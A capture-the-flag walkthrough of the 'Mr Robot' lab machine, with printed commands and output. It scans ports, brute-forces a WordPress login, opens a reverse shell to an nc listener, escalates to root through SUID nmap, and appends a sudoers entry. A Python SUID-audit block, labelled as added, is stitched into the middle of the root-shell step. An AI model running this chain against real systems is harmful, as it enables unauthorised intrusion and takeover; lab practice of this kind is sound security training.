mrrobot

MrRobot - Walkthrough Notes - Challenge to find 3 keys


Currently scanning: Finished!   |   Screen View: Unique Hosts

 13 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 676
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.18    08:00:27:fa:aa:aa      1      60  PCS Systemtechnik GmbH



From the ARP scan we know the target IP is 192.168.0.18.

Now a port scan of the top 1000 TCP ports...


PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https


Open up the web page and run Dirb against the site.


**robots.txt** lists:
fsocity.dic
key-1-of-3.txt


So now we can curl the first key:

-- curl http://192.168.0.18/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Next, the dirb output shows us a login page for a WordPress site...

wp-admin/login.php

Now the first task is to work out the username.

We use the user list we found via robots.txt (fsocity.dic) and feed it into the username field with Burp Repeater.

Now we view the responses and find a username for which the site says the password is wrong.
This gives away that the user "elliot" exists.

Now we use WPwner with the username elliot and run it against the wordlist as the passwords, with 40 threads.

OK, so let's look at the fsocity.dic file.

If we do a word count we see there are a lot of entries, including a lot of duplicates.

Let's remove the duplicates to bring the file size down and direct the output to a new file:


awk '!seen[$0]++' fsocity.dic > unique.txt

Now we run this wordlist through WPwner and we find the admin password:

python wpforce.py -i uset.txt -w ~/123/uniques.txt -u "http://192.168.0.18/" -t 40 -v
Trying elliot : Interesting
--------------------------
[elliot : ER28-0652] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
 100% Percent Complete
All correct pairs:
{'elliot': 'ER28-0652'}



Now that we know the username and password we can use Yertle to create a reverse shell.

Let's set up an nc listener to catch the Yertle shell:

-- nc -l -v -p 80


-- python yertle.py -t http://192.168.0.18 -u elliot -p ER28-0652 -v -li 192.168.0.100 -lp 80 -r


B00m, we are in!


####################################Priv Escalation#################################################

Looking in the home directory we find the user account 'robot'.
We find two files: the flag file, readable only by the user 'robot', and a file that looks to hold
the password as an MD5 hash.


daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

As this is an MD5 hash it is not directly decodable like base64.
Therefore we can try an online MD5 lookup and hope the hash has been cracked in the past.
Our luck is in and the password is:

abcdefghijklmnopqrstuvwxyz




***NOTE*** (if it were base64 we would do):
echo QWxhZGRpbjpvcGVuIHNlc2FtZQ== | base64 --decode

So now we know the password for the user account 'robot'.

So let's switch to this user:

su robot
password: abcdefghijklmnopqrstuvwxyz

and now we have the user robot's prompt:

robot:$

Now we have found the second Key - 822c73956184f694993bede3eb39f959

Search for files owned by root with the SUID bit set (they run as root no matter who executes them):

find / -user root -perm -4000 -exec ls -ldb {} \;


We find that nmap is installed. We know that older versions of nmap have an interactive mode, and because the binary is SUID root that mode runs as root.
It also allows system commands to be run, so they are executed as root :-)

Now we enter interactive mode (nmap --interactive), which gives us a root shell:
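As an added defender-side example (not part of the original walkthrough), the SUID check above turned into a small Python audit: it mirrors `find / -user root -perm -4000` and then compares the results against a baseline of expected SUID-root binaries, so that an out-of-place entry like a SUID nmap stands out. The baseline, the sample file records and their paths are constructed assumptions.

```python
import os
import stat
from dataclasses import dataclass

# Hypothetical baseline of SUID-root binaries expected on this host; a real
# audit should take this from a known-good image, not from memory.
EXPECTED_SUID_ROOT = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

@dataclass(frozen=True)
class FileRecord:
    path: str
    uid: int
    mode: int  # st_mode as returned by os.lstat()

def unexpected_suid_root(records, expected=EXPECTED_SUID_ROOT):
    """SUID files owned by root (uid 0) that are not on the baseline."""
    hits = []
    for rec in records:
        if not stat.S_ISREG(rec.mode):
            continue  # symlinks and directories never confer SUID
        if rec.uid == 0 and (rec.mode & stat.S_ISUID) and rec.path not in expected:
            hits.append(rec.path)
    return sorted(hits)

def scan_filesystem(root="/"):
    """Walk the live filesystem into FileRecords (needs read access)."""
    records = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished entry
            records.append(FileRecord(full, st.st_uid, st.st_mode))
    return records

# Constructed sample mirroring the box: stock SUID binaries plus a SUID nmap.
SAMPLE_RECORDS = [
    FileRecord("/bin/su", 0, 0o104755),
    FileRecord("/usr/bin/passwd", 0, 0o104755),
    FileRecord("/usr/local/bin/nmap", 0, 0o104755),      # the finding
    FileRecord("/usr/bin/nmap-link", 0, 0o120777),        # symlink, ignored
    FileRecord("/home/robot/tool", 1002, 0o104755),       # SUID but not root
]
# unexpected_suid_root(SAMPLE_RECORDS) -> ['/usr/local/bin/nmap']
```

Run `unexpected_suid_root(scan_filesystem())` on a real host to get the same report for the live filesystem.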


!sh

and here we go :-)

Next we can add the user robot to the sudoers file with:

echo "robot ALL=(ALL) ALL" >> /etc/sudoers

Now we look in /root and find the 3rd key:

04787ddef27c3dee1ee161b21670b4e4


Machine r00ted :-)
